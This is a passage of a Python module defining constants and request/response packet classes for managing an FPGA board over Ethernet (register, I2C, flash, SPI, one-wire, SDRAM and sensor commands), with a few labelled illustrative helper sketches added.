=\t0xF6\nMFR_FAN_RUN_TIME_CMD =\t\t0xF7\nMFR_FAN_PWM_AVG_CMD =\t\t0xF8\nMFR_FAN_PWM2RPM_CMD =\t\t0xF9\n\n# UCD90120A VOLTAGE AND CURRENT MONITORING DEFINES\nUCD90120A_VMON_I2C_DEVICE_ADDRESS =\t0x45\t# Without read/write bit\nUCD90120A_CMON_I2C_DEVICE_ADDRESS =\t0x47\t# Without read/write bit\n\n# UCD90120A VOLTAGE MONITOR PAGES\nP12V2_VOLTAGE_MON_PAGE =\t\t\t0\nP12V_VOLTAGE_MON_PAGE =\t\t\t\t1\nP5V_VOLTAGE_MON_PAGE =\t\t\t\t2\nP3V3_VOLTAGE_MON_PAGE =\t\t\t\t3\nP2V5_VOLTAGE_MON_PAGE =\t\t\t\t4\nP1V8_VOLTAGE_MON_PAGE =\t\t\t\t5\nP1V2_VOLTAGE_MON_PAGE =\t\t\t\t6\nP1V0_VOLTAGE_MON_PAGE =\t\t\t\t7\nP1V8_MGTVCCAUX_VOLTAGE_MON_PAGE =\t8\nP1V0_MGTAVCC_VOLTAGE_MON_PAGE =\t\t9\nP1V2_MGTAVTT_VOLTAGE_MON_PAGE =\t\t10\nP3V3_CONFIG_VOLTAGE_MON_PAGE =\t\t11\n\n# UCD90120A CURRENT MONITOR PAGES\nP12V2_CURRENT_MON_PAGE =\t\t\t0\nP12V_CURRENT_MON_PAGE =\t\t\t\t1\nP5V_CURRENT_MON_PAGE =\t\t\t\t2\nP3V3_CURRENT_MON_PAGE =\t\t\t\t3\nP2V5_CURRENT_MON_PAGE =\t\t\t\t4\nP3V3_CONFIG_CURRENT_MON_PAGE =\t\t5\nP1V2_CURRENT_MON_PAGE =\t\t\t\t6\nP1V0_CURRENT_MON_PAGE =\t\t\t\t7\nP1V8_MGTVCCAUX_CURRENT_MON_PAGE =\t8\nP1V0_MGTAVCC_CURRENT_MON_PAGE =\t\t9\nP1V2_MGTAVTT_CURRENT_MON_PAGE =\t\t10\nP1V8_CURRENT_MON_PAGE =\t\t\t\t11\n\n# 88E1111 GBE DEFINES\nGBE_88E1111_I2C_DEVICE_ADDRESS =\t0x58\t# Without read/write bit\n\n# FT4232H DEFINES\nFT4232H_RESET_USB =\t\t\t\t\t\t0x02\nFT4232H_USB_JTAG_CONTROL =\t\t\t\t0x08\nFT4232H_USB_I2C_CONTROL =\t\t\t\t0x20\nFT4232H_FPGA_ONLY_JTAG_CHAIN =\t\t\t0x40\nFT4232H_INCLUDE_MONITORS_IN_JTAG_CHAIN =0x80\n\n# Command Packet Structures\n\n#Command Header\nclass sCommandHeader(object):\n\tdef __init__(self, commandID, seqNum):\n\t\tself.uCommandType = commandID\n\t\tself.uSequenceNumber = seqNum\n\n# WRITE_REG\nclass sWriteRegReq(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg = BoardReg\n\t\tself.uRegAddress = RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\nclass sWriteRegResp(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow, Padding):\n\t\tself.Header \t = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg \t = BoardReg\n\t\tself.uRegAddress = 
RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\t\tself.uPadding \t = Padding\n\n#READ_REG\nclass sReadRegReq(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg \t = BoardReg\n\t\tself.uRegAddress = RegAddr\n\nclass sReadRegResp(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg = BoardReg\n\t\tself.uRegAddress = RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\t\tself.uPadding = Padding\n\n#WRITE_WISHBONE\nclass sWriteWishboneReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, WriteDataHigh, WriteDataLow):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\t\tself.uWriteDataHigh = WriteDataHigh\n\t\tself.uWriteDataLow \t= WriteDataLow\n\nclass sWriteWishboneResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, WriteDataHigh, WriteDataLow, Padding):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\t\tself.uWriteDataHigh = WriteDataHigh\n\t\tself.uWriteDataLow \t= WriteDataLow\n\t\tself.uPadding \t\t= Padding\n\n#READ_WISHBONE\nclass sReadWishboneReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow):\n\t\tself.Header \t\t= sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh \t= AddressHigh\n\t\tself.uAddressLow \t= AddressLow\n\nclass sReadWishboneResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, ReadDataHigh, ReadDataLow, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uReadDataHigh = ReadDataHigh\n\t\tself.uReadDataLow = ReadDataLow\n\t\tself.uPadding = Padding\n\n#WRITE_I2C\n\nclass sWriteI2CReq(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, WriteBytes):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\nclass sWriteI2CResp(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, WriteBytes, WriteSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uWriteSuccess = WriteSuccess\n\t\tself.uPadding = Padding\n\n#READ_I2C\nclass sReadI2CReq(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\nclass sReadI2CResp(object):\n\tdef __init__(self, CommandID, seqNum, I2C_interface_id, SlaveAddress, NumBytes, ReadBytes, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n
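# --- Illustration (not from the original file) --------------------------------
# The request classes in this module only name the packet fields; the file does
# not spell out the wire encoding. Purely as a sketch, assuming every field is
# one 16-bit little-endian word carried over UDP (field order and endianness
# are assumptions, not taken from this file), a sWriteRegReq could be sent as:
import socket
import struct

def send_write_reg_example(board_ip, req):
    # Header words first, then the four register fields, as six uint16 words.
    payload = struct.pack("<6H",
                          req.Header.uCommandType,
                          req.Header.uSequenceNumber,
                          req.uBoardReg,
                          req.uRegAddress,
                          req.uRegDataHigh,
                          req.uRegDataLow)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(payload, (board_ip, ETHERNET_CONTROL_PORT_ADDRESS))
    finally:
        sock.close()
# -------------------------------------------------------------------------------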
\n#SDRAM_RECONFIGURE\nclass sSdramReconfigureReq(object):\n\tdef __init__(self, commandID, seqNum, OutputMode, ClearSdram, FinishedWriting, AboutToBoot, DoReboot, ResetSdramReadAddress, ClearEthernetStats, EnableDebugSdramReadMode, DoSdramAsyncRead, DoContinuityTest, ContinuityTestOutputLow, ContinuityTestOutputHigh):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uOutputMode = OutputMode\n\t\tself.uClearSdram = ClearSdram\n\t\tself.uFinishedWriting = FinishedWriting\n\t\tself.uAboutToBoot = AboutToBoot\n\t\tself.uDoReboot = DoReboot\n\t\tself.uResetSdramReadAddress = ResetSdramReadAddress\n\t\tself.uClearEthernetStats = ClearEthernetStats\n\t\tself.uEnableDebugSdramReadMode = EnableDebugSdramReadMode\n\t\tself.uDoSdramAsyncRead = DoSdramAsyncRead\n\t\tself.uDoContinuityTest = DoContinuityTest\n\t\tself.uContinuityTestOutputLow = ContinuityTestOutputLow\n\t\tself.uContinuityTestOutputHigh = ContinuityTestOutputHigh\n\nclass sSdramReconfigureResp(object):\n\tdef __init__(self, commandID, seqNum, OutputMode, ClearSdram, FinishedWriting, AboutToBoot, DoReboot, ResetSdramReadAddress, ClearEthernetStats, EnableDebugSdramReadMode, DoSdramAsyncRead, NumEthernetFrames, NumEthernetBadFrames, NumEthernetOverloadFrames, SdramAsyncReadDataHigh, SdramAsyncReadDataLow, DoContinuityTest, ContinuityTestOutputLow, ContinuityTestOutputHigh):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uOutputMode = OutputMode\n\t\tself.uClearSdram = ClearSdram\n\t\tself.uFinishedWriting = FinishedWriting\n\t\tself.uAboutToBoot = AboutToBoot\n\t\tself.uDoReboot = DoReboot\n\t\tself.uResetSdramReadAddress = ResetSdramReadAddress\n\t\tself.uClearEthernetStats = ClearEthernetStats\n\t\tself.uEnableDebugSdramReadMode = EnableDebugSdramReadMode\n\t\tself.uNumEthernetFrames = NumEthernetFrames\n\t\tself.uNumEthernetBadFrames = NumEthernetBadFrames\n\t\tself.uNumEthernetOverloadFrames = NumEthernetOverloadFrames\n\t\tself.uSdramAsyncReadDataHigh = SdramAsyncReadDataHigh\n\t\tself.uSdramAsyncReadDataLow = SdramAsyncReadDataLow\n\t\tself.uDoSdramAsyncRead = DoSdramAsyncRead\n\t\tself.uDoContinuityTest = DoContinuityTest\n\t\tself.uContinuityTestOutputLow = ContinuityTestOutputLow\n\t\tself.uContinuityTestOutputHigh = ContinuityTestOutputHigh\n\n#READ_FLASH_WORDS\nclass sReadFlashWordsReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumWords = NumWords\n\nclass sReadFlashWordsResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumWords, ReadWords, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumWords = NumWords\n\t\tself.uReadWords = ReadWords\n\t\tself.uPadding = Padding\n\n#PROGRAM_FLASH_WORDS\nclass sProgramFlashWordsReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, TotalNumWords, PacketNumWords, DoBufferedProgramming, StartProgram, FinishProgram, WriteWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uTotalNumWords = TotalNumWords\n\t\tself.uPacketNumWords = PacketNumWords\n\t\tself.uDoBufferedProgramming = DoBufferedProgramming\n\t\tself.uStartProgram = StartProgram\n\t\tself.uFinishProgram = FinishProgram\n\t\tself.uWriteWords = WriteWords\n\nclass sProgramFlashWordsResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, 
AddressLow, TotalNumWords, PacketNumWords, DoBufferedProgramming, StartProgram, FinishProgram, ProgramSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uTotalNumWords = TotalNumWords\n\t\tself.uPacketNumWords = PacketNumWords\n\t\tself.uDoBufferedProgramming = DoBufferedProgramming\n\t\tself.uStartProgram = StartProgram\n\t\tself.uFinishProgram = FinishProgram\n\t\tself.uProgramSuccess = ProgramSuccess\n\t\tself.uPadding = Padding\n\n#ERASE_FLASH_BLOCK\nclass sEraseFlashBlockReq(object):\n\tdef __init__(self, commandID, seqNum, BlockAddressHigh, BlockAddressLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBlockAddressHigh = BlockAddressHigh\n\t\tself.uBlockAddressLow = BlockAddressLow\n\nclass sEraseFlashBlockResp(object):\n\tdef __init__(self, commandID, seqNum, BlockAddressHigh, BlockAddressLow, EraseSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBlockAddressHigh = BlockAddressHigh\n\t\tself.uBlockAddressLow = BlockAddressLow\n\t\tself.uEraseSuccess = EraseSuccess\n\t\tself.uPadding = Padding\n\n#READ_SPI_PAGE\nclass sReadSpiPageReq(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumBytes):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\nclass sReadSpiPageResp(object):\n\tdef __init__(self, commandID, seqNum, AddressHigh, AddressLow, NumBytes, ReadBytes, ReadSpiPageSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uReadSpiPageSuccess = ReadSpiPageSuccess\n\t\tself.uPadding = Padding\n\n#PROGRAM_SPI_PAGE\nclass sProgramSpiPageReq(object):\n\tdef __init__(self, CommandID, seqNum, AddressHigh, AddressLow, NumBytes, WriteBytes):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uWriteBytes = WriteBytes\n\nclass sProgramSpiPageResp(object):\n\tdef __init__(self, CommandID, seqNum, AddressHigh, AddressLow, NumBytes, VerifyBytes, ProgramSpiPageSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uAddressHigh = AddressHigh\n\t\tself.uAddressLow = AddressLow\n\t\tself.uNumBytes = NumBytes\n\t\tself.uVerifyBytes = VerifyBytes\n\t\tself.uProgramSpiPageSuccess = ProgramSpiPageSuccess\n\t\tself.uPadding = Padding\n\n#ERASE_SPI_SECTOR\nclass sEraseSpiSectorReq(object):\n\tdef __init__(self, commandID, seqNum, SectorAddressHigh, SectorAddressLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uSectorAddressHigh = SectorAddressHigh\n\t\tself.uSectorAddressLow = SectorAddressLow\n\n\nclass sEraseSpiSectorResp(object):\n\tdef __init__(self, commandID, seqNum, SectorAddressHigh, SectorAddressLow, EraseSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uSectorAddressHigh = SectorAddressHigh\n\t\tself.uSectorAddressLow = SectorAddressLow\n\t\tself.uEraseSuccess = EraseSuccess\n\t\tself.uPadding\t= Padding\n\n#ONE_WIRE_READ_ROM_CMD\nclass sOneWireReadROMReq(object):\n\tdef __init__(self, CommandID, seqNum, OneWirePort):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uOneWirePort = OneWirePort\n\nclass sOneWireReadROMResp(object):\n\tdef 
__init__(self, CommandID, seqNum, OneWirePort, Rom, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uOneWirePort = OneWirePort\n\t\tself.uRom = Rom\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#ONE_WIRE_DS2433_WRITE_MEM\nclass sOneWireDS2433WriteMemReq(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, WriteBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\nclass sOneWireDS2433WriteMemResp(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, WriteBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort, WriteSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uWriteBytes = WriteBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\t\tself.uWriteSuccess = WriteSuccess\n\t\tself.uPadding = Padding\n\n#ONE_WIRE_DS2433_READ_MEM\nclass sOneWireDS2433ReadMemReq(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, NumBytes, TargetAddress1, TargetAddress2, OneWirePort):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\nclass sOneWireDS2433ReadMemResp(object):\n\tdef __init__(self, CommandID, seqNum, DeviceRom, SkipRomAddress, ReadBytes, NumBytes, TargetAddress1, TargetAddress2, OneWirePort, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uDeviceRom = DeviceRom\n\t\tself.uSkipRomAddress = SkipRomAddress\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uTA1 = TargetAddress1\n\t\tself.uTA2 = TargetAddress2\n\t\tself.uOneWirePort = OneWirePort\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#DEBUG_CONFIGURE_ETHERNET\nclass sDebugConfigureEthernetReq(object):\n\tdef __init__(self, commandID, seqNum, InterfaceID, FabricMacHigh, FabricMacMid, FabricMacLow, FabricPortAddress, GatewayArpCacheAddress, FabricIPAddressHigh, FabricIPAddressLow, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, EnableFabricInterface):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMacHigh = FabricMacHigh\n\t\tself.uFabricMacMid = FabricMacMid\n\t\tself.uFabricMacLow = FabricMacLow\n\t\tself.uFabricPortAddress = FabricPortAddress\n\t\tself.uGatewayArpCacheAddress = GatewayArpCacheAddress\n\t\tself.uFabricIPAddressHigh = FabricIPAddressHigh\n\t\tself.uFabricIPAddressLow = FabricIPAddressLow\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uEnableFabricInterface = EnableFabricInterface\n\nclass 
sDebugConfigureEthernetResp(object):\n\tdef __init__(self, commandID, seqNum, InterfaceID, FabricMacHigh, FabricMacMid, FabricMacLow, FabricPortAddress, GatewayArpCacheAddress, FabricIPAddressHigh, FabricIPAddressLow, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, EnableFabricInterface, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMacHigh = FabricMacHigh\n\t\tself.uFabricMacMid = FabricMacMid\n\t\tself.uFabricMacLow = FabricMacLow\n\t\tself.uFabricPortAddress = FabricPortAddress\n\t\tself.uGatewayArpCacheAddress = GatewayArpCacheAddress\n\t\tself.uFabricIPAddressHigh = FabricIPAddressHigh\n\t\tself.uFabricIPAddressLow = FabricIPAddressLow\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uEnableFabricInterface = EnableFabricInterface\n\t\tself.uPadding = Padding\n\n#DEBUG_ADD_ARP_CACHE_ENTRY\nclass sDebugAddARPCacheEntryReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, IPAddressLower8Bits, MacHigh, MacMid, MacLow):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uIPAddressLower8Bits = IPAddressLower8Bits\n\t\tself.uMacHigh = MacHigh\n\t\tself.uMacMid = MacMid\n\t\tself.uMacLow = MacLow\n\nclass sDebugAddARPCacheEntryResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, IPAddressLower8Bits, MacHigh, MacMid, MacLow, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uIPAddressLower8Bits = IPAddressLower8Bits\n\t\tself.uMacHigh = MacHigh\n\t\tself.uMacMid = MacMid\n\t\tself.uMacLow = MacLow\n\t\tself.uPadding = Padding\n\n#GET_EMBEDDED_SOFTWARE_VERS\nclass sGetEmbeddedSoftwareVersionReq(object):\n\tdef __init__(self, CommandID, seqNum):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\nclass sGetEmbeddedSoftwareVersionResp(object):\n\tdef __init__(self, CommandID, seqNum, VersionMajor, VersionMinor, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uVersionMajor = VersionMajor\n\t\tself.uVersionMinor = VersionMinor\n\t\tself.uPadding = Padding\n\n#PMBUS_READ_I2C\nclass sPMBusReadI2CBytesReq(object):\n\tdef __init__(self, commandID, seqNum, I2C_interface_id, SlaveAddress, CommandCode, NumBytes):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uCommandCode = CommandCode\n\t\tself.uNumBytes = NumBytes\n\nclass sPMBusReadI2CBytesResp(object):\n\tdef __init__(self, commandID, seqNum, I2C_interface_id, SlaveAddress, CommandCode, ReadBytes, NumBytes, ReadSuccess, Padding):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uId = I2C_interface_id\n\t\tself.uSlaveAddress = SlaveAddress\n\t\tself.uCommandCode = CommandCode\n\t\tself.uReadBytes = ReadBytes\n\t\tself.uNumBytes = NumBytes\n\t\tself.uReadSuccess = ReadSuccess\n\t\tself.uPadding = Padding\n\n#SDRAM_PROGRAM\nclass sSdramProgramReq(object):\n\tdef __init__(self, commandID, seqNum, FirstPacket, LastPacket, WriteWords):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uFirstPacket = FirstPacket\n\t\tself.uLastPacket = LastPacket\n\t\tself.uWriteWords = WriteWords
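# --- Illustration (not from the original file) --------------------------------
# sSdramProgramReq flags the first and the last packet of a multi-packet
# bitstream upload. A sketch of chunking raw bitstream bytes into a series of
# such requests; the 994-words-per-packet chunk size is an assumption made for
# illustration, not a value taken from this file.
def iter_sdram_program_reqs(bitstream_bytes, first_seq=0, words_per_packet=994):
    chunk_size = words_per_packet * 2  # 16-bit words -> bytes
    chunks = [bitstream_bytes[i:i + chunk_size]
              for i in range(0, len(bitstream_bytes), chunk_size)]
    for n, chunk in enumerate(chunks):
        yield sSdramProgramReq(SDRAM_PROGRAM, first_seq + n,
                               FirstPacket=int(n == 0),
                               LastPacket=int(n == len(chunks) - 1),
                               WriteWords=chunk)
# -------------------------------------------------------------------------------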
\n\n#CONFIGURE_MULTICAST\nclass sConfigureMulticastReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\nclass sConfigureMulticastResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, FabricMultiCastIPAddressHigh, FabricMultiCastIPAddressLow, FabricMultiCastIPAddressMaskHigh, FabricMultiCastIPAddressMaskLow, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uFabricMultiCastIPAddressHigh = FabricMultiCastIPAddressHigh\n\t\tself.uFabricMultiCastIPAddressLow = FabricMultiCastIPAddressLow\n\t\tself.uFabricMultiCastIPAddressMaskHigh = FabricMultiCastIPAddressMaskHigh\n\t\tself.uFabricMultiCastIPAddressMaskLow = FabricMultiCastIPAddressMaskLow\n\t\tself.uPadding = Padding\n\n#DEBUG_LOOPBACK_TEST\nclass sDebugLoopbackTestReq(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, TestData):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uTestData = TestData\n\nclass sDebugLoopbackTestResp(object):\n\tdef __init__(self, CommandID, seqNum, InterfaceID, TestData, Valid, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uId = InterfaceID\n\t\tself.uTestData = TestData\n\t\tself.uValid = Valid\n\t\tself.uPadding = Padding\n\n#QSFP_RESET_AND_PROG\nclass sQSFPResetAndProgramReq(object):\n\tdef __init__(self, CommandID, seqNum, Reset, Program):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uReset = Reset\n\t\tself.uProgram = Program\n\nclass sQSFPResetAndProgramResp(object):\n\tdef __init__(self, CommandID, seqNum, Reset, Program, Padding):\n\t\tself.Header = sCommandHeader(CommandID, seqNum)\n\t\tself.uReset = Reset\n\t\tself.uProgram = Program\n\t\tself.uPadding = Padding\n\n#Mezzanine Site Identifiers\nclass sMezzanine(object):\n\tMezzanine0 = 0\n\tMezzanine1 = 1\n\tMezzanine2 = 2\n\tMezzanine3 = 3\n\n#Temperature Sensor Identifiers\nclass sTempsensor(object):\n\tInletTemp = 0\n\tOutletTemp = 1\n\tFPGATemp = 2\n\tMezzanine0Temp = 3\n\tMezzanine1Temp = 4\n\tMezzanine2Temp = 5\n\tMezzanine3Temp = 6\n\tFanContTemp = 7\n\n#Fan Identifiers\nclass sFan(object):\n\tLeftFrontFan = 0\n\tLeftMiddleFan = 1\n\tLeftBackFan = 2\n\tRightBackFan = 3\n\tFPGAFan = 4\n\n#Voltage Identifiers\nclass sVoltage(object):\n\tP12V2Voltage = 0\n\tP12VVoltage = 1\n\tP5VVoltage = 2\n\tP3V3Voltage = 3\n\tP2V5Voltage = 4\n\tP1V8Voltage = 5\n\tP1V2Voltage = 6\n\tP1V0Voltage = 7\n\tP1V8MGTVCCAUXVoltage = 8\n\tP1V0MGTAVCCVoltage = 9\n\tP1V2MGTAVTTVoltage = 10\n\tP3V3ConfigVoltage = 11\n\n#Current Identifiers\nclass sCurrent(object):\n\tP12V2Current = 0\n\tP12VCurrent = 1\n\tP5VCurrent = 2\n\tP3V3Current = 3\n\tP2V5Current = 4\n\tP1V8Current = 5\n\tP1V2Current = 6\n\tP1V0Current = 7\n\tP1V8MGTVCCAUXCurrent = 8\n\tP1V0MGTAVCCCurrent = 9\n\tP1V2MGTAVTTCurrent = 10\n\tP3V3ConfigCurrent = 11
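# --- Illustration (not from the original file) --------------------------------
# Per the note at the command ID table above, a response repeats the request's
# sequence number and carries the request's command ID + 1. A small helper for
# checking a parsed response header against the request that produced it:
def response_matches_request(req_header, resp_header):
    return (resp_header.uCommandType == req_header.uCommandType + 1
            and resp_header.uSequenceNumber == req_header.uSequenceNumber)

# e.g. response_matches_request(sCommandHeader(READ_REG, 7),
#                               sCommandHeader(READ_REG + 1, 7))  # -> True
# -------------------------------------------------------------------------------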
